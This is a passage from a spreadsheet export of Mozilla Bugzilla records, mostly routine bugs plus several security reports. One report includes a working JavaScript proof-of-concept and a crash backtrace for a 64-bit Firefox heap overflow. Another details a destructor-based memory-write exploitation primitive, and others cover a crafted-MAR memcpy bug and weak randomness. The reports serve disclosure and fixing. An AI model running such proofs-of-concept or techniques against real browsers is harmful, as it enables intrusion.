 2. Create a all-day event, reminder defaults as 'None', save it  -&gt; then view this all-day event, then to edit it    -&gt;  find that reminder cann't be changed -&gt; KO 
 EXPECTED BEHAVIOUR:
 Reminder should can be modified normally.
 ASSOCIATE SPECIFICATION:
 TEST PLAN REFERENCE:
 TOOLS AND PLATFORMS USED:
 USER IMPACT:
 Mid
 REPRODUCING RATE:
 5/5
 For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X731" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="732">
      <c r="A732" t="n">
        <v>534666</v>
      </c>
      <c r="B732" t="inlineStr">
        <is>
          <t>2009-12-14 10:25:55 -0800</t>
        </is>
      </c>
      <c r="C732" t="inlineStr">
        <is>
          <t>Heap buffer overflow and crash [@ nsGenericDOMDataNode::SetTextInternal] on 64-bit</t>
        </is>
      </c>
      <c r="D732" t="inlineStr">
        <is>
          <t>2010-07-15 18:18:53 -0700</t>
        </is>
      </c>
      <c r="E732" t="n">
        <v>1</v>
      </c>
      <c r="F732" t="n">
        <v>1</v>
      </c>
      <c r="G732" t="n">
        <v>3</v>
      </c>
      <c r="H732" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I732" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J732" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K732" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L732" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M732" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N732" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O732" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P732" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q732" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R732" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S732" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T732" t="n">
        <v>1</v>
      </c>
      <c r="U732" t="n">
        <v>0</v>
      </c>
      <c r="V732" t="n">
        <v>25</v>
      </c>
      <c r="W732" t="inlineStr">
        <is>
          <t>Nils reported this bug to security@mozilla.org.  Here's his full message:
-----
Firefox 3.5 64-Bit nsGenericDOMDataNode::SetTextInternal
I found a heap buffer overflow vulnerability which is caused by a integer overflow in nsGenericDOMDataNode::SetTextInternal(). Due to the amount of data needed to trigger the vulnerability (&gt; 8 gigbytes), this is only exploitable on 64-bit systems. It was tested on Ubuntu AMD64 with the default install of Firefox and a custom build of Firefox on the same system.
The vulnerable code is in nsGenericDOMDataNode::SetTextInternal()
content/base/src/nsGenericDOMDataNode.cpp:399:
    PRInt32 newLength = textLength - aCount + aLength;
    PRUnichar* to = new PRUnichar[newLength];
    NS_ENSURE_TRUE(to, NS_ERROR_OUT_OF_MEMORY);
    // Copy over appropriate data
    if (0 != aOffset) {
      mText.CopyTo(to, 0, aOffset);
    }
    if (0 != aLength) {
      memcpy(to + aOffset, aBuffer, aLength * sizeof(PRUnichar));
    }
With a very large aLength or textLength an attacker would be able to wrap the integer newLength, resulting in an allocation of a too small buffer. When aLength is large than zero the memcpy() will overflow the buffer.
A fix would use size_t or similar value types for all length values. Furthermore the result of calculations which may wrap should be checked.
 The following Proof-of-Concept code will trigger the bug. Note that there will be multiple ways of triggering the issue:
POC Code:
------------------------- test.js ------------------------------
// fast way of allocating huge strings
function getlongstr(leng) {
        var str = unescape("%udead");
        var tsize = leng;
        while(str.length &lt; ((tsize/6)/0x10)) str += str;
        str = str.substring(0, ((tsize/6)/0x10));
        var sz = tsize / 6;
        var comp = str.length;
        var ar = new Array();
        var act = 0;
        for(var i=0; i&lt;0x11; i++) {
                act += comp;
                ar.push(str);
        }
        var longstr = ar.join("");
        longstr = longstr.substring(0, tsize/6);
        ar = null;
        str = null;
        longstr = escape(longstr);
        return longstr;
}
function start() {
        var appendStr = "AA";
        while(appendStr.length &lt; 16500) appendStr+=appendStr;
        var x= document.createComment("");
        alert("created comment");
        var longstr = getlongstr(0xfffffffc);
        x.appendData(appendStr);
        x.insertData(0x7f80, longstr);
        alert("done");
}
start();
-----------------------------------------------------------------
Provided the test system has enough memory (&gt;8 gigabyte) following crash will be triggered:
Stack backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff6ddf7ca in nsGenericDOMDataNode::SetTextInternal (
    this=0x7fffddbc9380, aOffset=32640, aCount=1992294400, 
    aBuffer=0x7ffcf6cf7954, aLength=4294967292, aNotify=1)
    at /usr/include/bits/string3.h:52
52        return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
(gdb) bt 10
#0  0x00007ffff6ddf7ca in nsGenericDOMDataNode::SetTextInternal (
    this=0x7fffddbc9380, aOffset=32640, aCount=1992294400, 
    aBuffer=0x7ffcf6cf7954, aLength=4294967292, aNotify=1)
    at /usr/include/bits/string3.h:52
#1  0x00007ffff731f139 in NS_InvokeByIndex_P (that=0x7fffffffc430, 
    methodIndex=4294951152, paramCount=32767, params=0x7fffddc24000)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_linux.cpp:208
#2  0x00007ffff6b42b81 in XPCWrappedNative::CallMethod (ccx=..., mode=16)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/xpconnect/src/xpcwrappednative.cpp:2456
#3  0x00007ffff6b4a5fb in XPC_WN_CallMethod (cx=0x7fffe3356000, 
    obj=0x7ffc771cc100, argc=3720560384, argv=0x1ffa33ef8, vp=0x8000)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1590
#4  0x00007ffff6434383 in js_Invoke (cx=0x7fffe3356000, argc=32767, 
    vp=0x7fffe237e160, flags=32767)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/jsinterp.cpp:1386
#5  0x00007ffff64255bc in js_Interpret (cx=0x7fffe3356000)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/jsinterp.cpp:5179
#6  0x00007ffff643438d in js_Invoke (cx=0x7fffe3356000, argc=32767, 
    vp=0x7fffe237e040, flags=32767)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/jsinterp.cpp:1394
#7  0x00007ffff64346e4 in js_InternalInvoke (cx=0x7fffe3356000, 
    obj=0x7fffddb90480, fval=140736913381888, flags=0, argc=32768, 
    argv=0x7f80, rval=0x7ffff63fc8e5)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/jsinterp.cpp:1447
#8  0x00007ffff63fc8e5 in JS_CallFunctionValue (cx=0x7fffe3356000, 
    obj=0x7ffc771cc100, fval=140736913948416, argc=4288888568, argv=0x8000, 
    rval=0x7f80)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/js/src/jsapi.cpp:5187
#9  0x00007ffff6ef9126 in nsJSContext::CallEventHandler (this=0x7fffe65fb760, 
    aTarget=0x7ffc771cc100, aScope=0x7fffddc33f00, aHandler=0x7fffddba9a00, 
    aargv=0x7fffe3356000, arv=0x7fffffffceb0)
    at /home/nils/64-bit/audit/firefox/mozilla-1.9.1/dom/src/base/nsJSEnvironment.cpp:2085
(More stack frames follow...)</t>
        </is>
      </c>
      <c r="X732" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="733">
      <c r="A733" t="n">
        <v>1473113</v>
      </c>
      <c r="B733" t="inlineStr">
        <is>
          <t>2018-07-03 12:09:01 -0700</t>
        </is>
      </c>
      <c r="C733" t="inlineStr">
        <is>
          <t>Invalid memcpy in mar_read.c</t>
        </is>
      </c>
      <c r="D733" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:59 -0700</t>
        </is>
      </c>
      <c r="E733" t="n">
        <v>1</v>
      </c>
      <c r="F733" t="n">
        <v>1</v>
      </c>
      <c r="G733" t="n">
        <v>3</v>
      </c>
      <c r="H733" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I733" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J733" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K733" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L733" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M733" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N733" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O733" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P733" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main62+][adv-esr60.2+]</t>
        </is>
      </c>
      <c r="Q733" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R733" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S733" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T733" t="n">
        <v>1</v>
      </c>
      <c r="U733" t="n">
        <v>0</v>
      </c>
      <c r="V733" t="n">
        <v>13</v>
      </c>
      <c r="W733" t="inlineStr">
        <is>
          <t>Created attachment 8989519
update.mar.zip
By opening a mar file which contains a very long item file name (length = max int) it's possible to trigger an invalid memcpy call. This can lead to an out-of-bounds read/write.
To reproduce extract the update.mar and try an update with an 64bit updater or use the mar tool like 'mar -t ./update.mar'
ASAN-Log:
==11754==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)
    #0 0x4bdeb4 in __asan_memcpy moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
    #1 0x500c2a in mar_insert_item  src/modules/libmar/src/mar_read.c:44:3
    #2 0x500c2a in mar_consume_index  src/modules/libmar/src/mar_read.c:109
    #3 0x500c2a in mar_read_index  src/modules/libmar/src/mar_read.c:142
    #4 0x500c2a in mar_fpopen  src/modules/libmar/src/mar_read.c:164
    #5 0x500c2a in mar_open  src/modules/libmar/src/mar_read.c:182
    #6 0x4efa94 in ArchiveReader::Open(char const*)  src/toolkit/mozapps/update/updater/archivereader.cpp:209:14
    #7 0x4f908d in UpdateThreadFunc(void*)  src/toolkit/mozapps/update/updater/updater.cpp:2480:27
...</t>
        </is>
      </c>
      <c r="X733" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="734">
      <c r="A734" t="n">
        <v>728741</v>
      </c>
      <c r="B734" t="inlineStr">
        <is>
          <t>2012-02-19 15:38:32 -0800</t>
        </is>
      </c>
      <c r="C734" t="inlineStr">
        <is>
          <t>Nagios warning about disk space on moz2-linux-slave09:/</t>
        </is>
      </c>
      <c r="D734" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E734" t="n">
        <v>1</v>
      </c>
      <c r="F734" t="n">
        <v>1</v>
      </c>
      <c r="G734" t="n">
        <v>5</v>
      </c>
      <c r="H734" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I734" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J734" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K734" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L734" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M734" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N734" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O734" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P734" t="inlineStr"/>
      <c r="Q734" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R734" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S734" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T734" t="n">
        <v>1</v>
      </c>
      <c r="U734" t="n">
        <v>0</v>
      </c>
      <c r="V734" t="n">
        <v>2</v>
      </c>
      <c r="W734" t="inlineStr">
        <is>
          <t>Nagios has been squawking about this for a few days:
moz2-linux-slave09.build.sjc1:disk - / is WARNING: DISK WARNING - free space: / 429 MB (5% inode=86%)
Probably started when the latest Android SDK got pushed out but is due to something else being present on this slave that isn't elsewhere.</t>
        </is>
      </c>
      <c r="X734" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="735">
      <c r="A735" t="n">
        <v>1372849</v>
      </c>
      <c r="B735" t="inlineStr">
        <is>
          <t>2017-06-14 02:33:07 -0700</t>
        </is>
      </c>
      <c r="C735" t="inlineStr">
        <is>
          <t>WindowsDllDetourPatcher Destructor Exploit Primitive</t>
        </is>
      </c>
      <c r="D735" t="inlineStr">
        <is>
          <t>2018-02-01 16:45:25 -0800</t>
        </is>
      </c>
      <c r="E735" t="n">
        <v>1</v>
      </c>
      <c r="F735" t="n">
        <v>1</v>
      </c>
      <c r="G735" t="n">
        <v>3</v>
      </c>
      <c r="H735" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I735" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J735" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K735" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N735" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O735" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P735" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q735" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R735" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S735" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T735" t="n">
        <v>1</v>
      </c>
      <c r="U735" t="n">
        <v>0</v>
      </c>
      <c r="V735" t="n">
        <v>29</v>
      </c>
      <c r="W735" t="inlineStr">
        <is>
          <t>WindowsDllDetourPatcher Destructor Exploit Primitive
The destructor function for the WindowsDllDetourPatcher class can be re-purposed by an attacker during the exploitation of a memory corruption exploit to force attacker controlled data to be written to an attacker controlled location in memory. Furthermore the destructor function will modify the protection of the memory being written-to, to be writable, before reverting it back to the original protection. This allows an attacker to write arbitrary code to an existing code section before executing it. This issue was found as part of a security review and a working exploit using this technique was developed against FF 52.0 64-Bit on Windows 10.0.15063 (See magic_selfrando_pdatascan1.html in https://bugzilla.mozilla.org/show_bug.cgi?id=1371002).
The purpose of the ~WindowsDllDetourPatcher function is to remove existing hooks in place by overwriting the destination pointer from the "JMP pointer" (x86) or "MOV R11, pointer; JMP R11" (x64) code bytes previously written by CreateTrampoline back to the address of the trampoline, which effectively removes the hook. The mHookPage member variable is a pointer to a buffer that holds several items for every hook that has been added; including a pointer to the original location where the hook was inserted and the trampoline code itself.
An attacker with a read/write primitive can discover the location of the mozilla::internal::WindowsDllDetourPatcher::~WindowsDllDetourPatcher function and modify an existing object in heap memory in order to change a vftable entry to allow the ~WindowsDllDetourPatcher function to be called. When ~WindowsDllDetourPatcher is called, it will use member variables stored in the corrupted object and thus the attacker can control the mHookPage and mCurHooks member variables.
Note: This issue is separate from https://bugzilla.mozilla.org/show_bug.cgi?id=1344034 as the attacker can set the mHookPage pointer to point to a RW buffer of their choosing. No existing hooks will be in place (as we forge a new WindowsDllDetourPatcher instance) so this buffer never needs to be executable.
The attacker can then specify a target location to write to (for example a location in a RX .text section is a good candidate). The data written is an address within the mHookPage buffer (what would be the location of the trampoline code). As the attacker can control this address, the attacker can choose an arbitrary low byte when setting the address in order to force a byte of attacker controlled data to be written to the target address. This operation can be repeated multiple times to allow an arbitrary sequence of bytes to be written.
The above technique can be used during any memory corruption exploit where an attacker has a read/write primitive. In order to harden the ~WindowsDllDetourPatcher function from being re-purposed by an attacker, several options are available:
	1. Encode the origBytes pointers held in the mHookPage buffer using a secure technique like EncodePointer/DecodePointer (which use a secret held in the kernel to avoid an attacker leaking it). Note: This API is available on XPSP2 and up.
	2. Ensure the byte(s) preceding the location being written to are the expected ones. As the write replaces the dest pointer for a jmp, we can always expect the preceding byte on x86 to be 0xE9 for a "JMP ptr" instruction and on x64 it can be expected to be 0x49, 0xBB for a "MOV R11, ptr; JMP R11" sequence. If the expected bytes are not found the process should __fastfail.
	3. Enable CFG as ~WindowsDllDetourPatcher would not be an indirect call target as the class (or the destructor) is not virtual, so methods are called directly and not indirectly via a vftable. This would prevent an attacker calling the destructor via a corrupted object.
	4. Enable immutable code pages on systems that support it, e.g. on Windows 10, this is available in the form of Arbitrary Code Guard (ACG). However this is a non trivial change which will probably require out of process JIT engine, out of process hooking and so on.
Options 1 and 2 are the best short term solutions, with 3 the best mid term and 4 the best long term solution.</t>
        </is>
      </c>
      <c r="X735" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="736">
      <c r="A736" t="n">
        <v>50364</v>
      </c>
      <c r="B736" t="inlineStr">
        <is>
          <t>2000-08-25 15:30:49 -0700</t>
        </is>
      </c>
      <c r="C736" t="inlineStr">
        <is>
          <t>Acrobat reader does not launch as helper app anymore</t>
        </is>
      </c>
      <c r="D736" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E736" t="n">
        <v>1</v>
      </c>
      <c r="F736" t="n">
        <v>1</v>
      </c>
      <c r="G736" t="n">
        <v>6</v>
      </c>
      <c r="H736" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I736" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J736" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K736" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L736" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M736" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N736" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O736" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P736" t="inlineStr"/>
      <c r="Q736" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R736" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S736" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T736" t="n">
        <v>1</v>
      </c>
      <c r="U736" t="n">
        <v>0</v>
      </c>
      <c r="V736" t="n">
        <v>7</v>
      </c>
      <c r="W736" t="inlineStr">
        <is>
          <t>Build:2000082504m18
After adding details for new mime type for acrobat reader, if I click on a link 
with pdf extension, "Unknown File" dialog is popping up. I see this working 
fine in 2000081505m18 build.</t>
        </is>
      </c>
      <c r="X736" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="737">
      <c r="A737" t="n">
        <v>446101</v>
      </c>
      <c r="B737" t="inlineStr">
        <is>
          <t>2008-07-18 14:18:03 -0700</t>
        </is>
      </c>
      <c r="C737" t="inlineStr">
        <is>
          <t>setup unittests for tracemonkey builds</t>
        </is>
      </c>
      <c r="D737" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E737" t="n">
        <v>1</v>
      </c>
      <c r="F737" t="n">
        <v>1</v>
      </c>
      <c r="G737" t="n">
        <v>5</v>
      </c>
      <c r="H737" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I737" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J737" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K737" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N737" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O737" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P737" t="inlineStr"/>
      <c r="Q737" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R737" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S737" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T737" t="n">
        <v>1</v>
      </c>
      <c r="U737" t="n">
        <v>0</v>
      </c>
      <c r="V737" t="n">
        <v>29</v>
      </c>
      <c r="W737" t="inlineStr">
        <is>
          <t>Spinning out from bug#442522.
This bug is to track running unittests, or adding new unittest suites, to run on each tracemonkey build. From discussions in bug#442522, its unclear to me what exact tests, on what exact OS are of interest. Is this summary correct, or did I miss something?
Run following suites:
mochitest 
js/tests suite (-L lc2 lc3 spidermonkey-n.tests slow-n.tests)
Unittest results should be posted on the same waterfall page as the tracemonkey build results... which is still being figured out in bug#442522.</t>
        </is>
      </c>
      <c r="X737" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="738">
      <c r="A738" t="n">
        <v>1481528</v>
      </c>
      <c r="B738" t="inlineStr">
        <is>
          <t>2018-08-07 09:58:00 -0700</t>
        </is>
      </c>
      <c r="C738" t="inlineStr">
        <is>
          <t>switch from python 2 to python 3</t>
        </is>
      </c>
      <c r="D738" t="inlineStr">
        <is>
          <t>2019-10-09 06:31:05 -0700</t>
        </is>
      </c>
      <c r="E738" t="n">
        <v>1</v>
      </c>
      <c r="F738" t="n">
        <v>1</v>
      </c>
      <c r="G738" t="n">
        <v>7</v>
      </c>
      <c r="H738" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I738" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J738" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K738" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L738" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M738" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N738" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O738" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P738" t="inlineStr"/>
      <c r="Q738" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R738" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S738" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T738" t="n">
        <v>1</v>
      </c>
      <c r="U738" t="n">
        <v>0</v>
      </c>
      <c r="V738" t="n">
        <v>6</v>
      </c>
      <c r="W738" t="inlineStr">
        <is>
          <t>now that bug 636155 has been fixed we can switch from py2 to py3.</t>
        </is>
      </c>
      <c r="X738" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="739">
      <c r="A739" t="n">
        <v>1110212</v>
      </c>
      <c r="B739" t="inlineStr">
        <is>
          <t>2014-12-11 08:29:24 -0800</t>
        </is>
      </c>
      <c r="C739" t="inlineStr">
        <is>
          <t>Fennec name resolver uses weak DNS randomness (see CVE-2012-2808)</t>
        </is>
      </c>
      <c r="D739" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:39 -0700</t>
        </is>
      </c>
      <c r="E739" t="n">
        <v>1</v>
      </c>
      <c r="F739" t="n">
        <v>1</v>
      </c>
      <c r="G739" t="n">
        <v>3</v>
      </c>
      <c r="H739" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I739" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J739" t="inlineStr">
        <is>
          <t>Networking: DNS</t>
        </is>
      </c>
      <c r="K739" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L739" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M739" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N739" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O739" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P739" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q739" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R739" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S739" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T739" t="n">
        <v>1</v>
      </c>
      <c r="U739" t="n">
        <v>0</v>
      </c>
      <c r="V739" t="n">
        <v>24</v>
      </c>
      <c r="W739" t="inlineStr">
        <is>
          <t>Our own DNS resolving code is based on an older Android/bionic version.
That older code uses a weak random algorithm for the ID in the DNS resolves, which makes it vulnerable to DNS poisoning attacks. See URL that links to an IBM report about this problem.
This problem has since been fixed in the upstream bionic tree.</t>
        </is>
      </c>
      <c r="X739" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="740">
      <c r="A740" t="n">
        <v>824828</v>
      </c>
      <c r="B740" t="inlineStr">
        <is>
          <t>2012-12-26 14:48:46 -0800</t>
        </is>
      </c>
      <c r="C740" t="inlineStr">
        <is>
          <t>The reset pages needs mobile optimization</t>
        </is>
      </c>
      <c r="D740" t="inlineStr">
        <is>
          <t>2013-02-07 10:11:27 -0800</t>
        </is>
      </c>
      <c r="E740" t="n">
        <v>1</v>
      </c>
      <c r="F740" t="n">
        <v>1</v>
      </c>
      <c r="G740" t="n">
        <v>5</v>
      </c>
      <c r="H740" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I740" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J740" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K740" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L740" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M740" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N740" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O740" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P740" t="inlineStr">
        <is>
          <t>u=user c=questions p=1 s=2013.2</t>
        </is>
      </c>
      <c r="Q740" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R740" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S740" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T740" t="n">
        <v>1</v>
      </c>
      <c r="U740" t="n">
        <v>0</v>
      </c>
      <c r="V740" t="n">
        <v>16</v>
      </c>
      <c r="W740" t="inlineStr">
        <is>
          <t>Hello the following pages needs mobilised 
My password isn't working
https://support.mozilla.org/users/pwreset
I forgot my username
https://support.mozilla.org/users/forgot-username
The reset conformation email
https://support.mozilla.org/users/resendconfirmation</t>
        </is>
      </c>
      <c r="X740" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="741">
      <c r="A741" t="n">
        <v>1870579</v>
      </c>
      <c r="B741" t="inlineStr">
        <is>
          <t>2023-12-17 23:54:48 -0800</t>
        </is>
      </c>
      <c r="C741" t="inlineStr">
        <is>
          <t>Use of insecure rand() function to generate cnonce value in HTTP digest auth</t>
        </is>
      </c>
      <c r="D741" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:38 -0700</t>
        </is>
      </c>
      <c r="E741" t="n">
        <v>1</v>
      </c>
      <c r="F741" t="n">
        <v>1</v>
      </c>
      <c r="G741" t="n">
        <v>3</v>
      </c>
      <c r="H741" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I741" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J741" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K741" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L741" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M741" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N741" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O741" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P741" t="inlineStr">
        <is>
          <t>[necko-triaged] [adv-main126+]</t>
        </is>
      </c>
      <c r="Q741" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R741" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S741" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T741" t="n">
        <v>1</v>
      </c>
      <c r="U741" t="n">
        <v>0</v>
      </c>
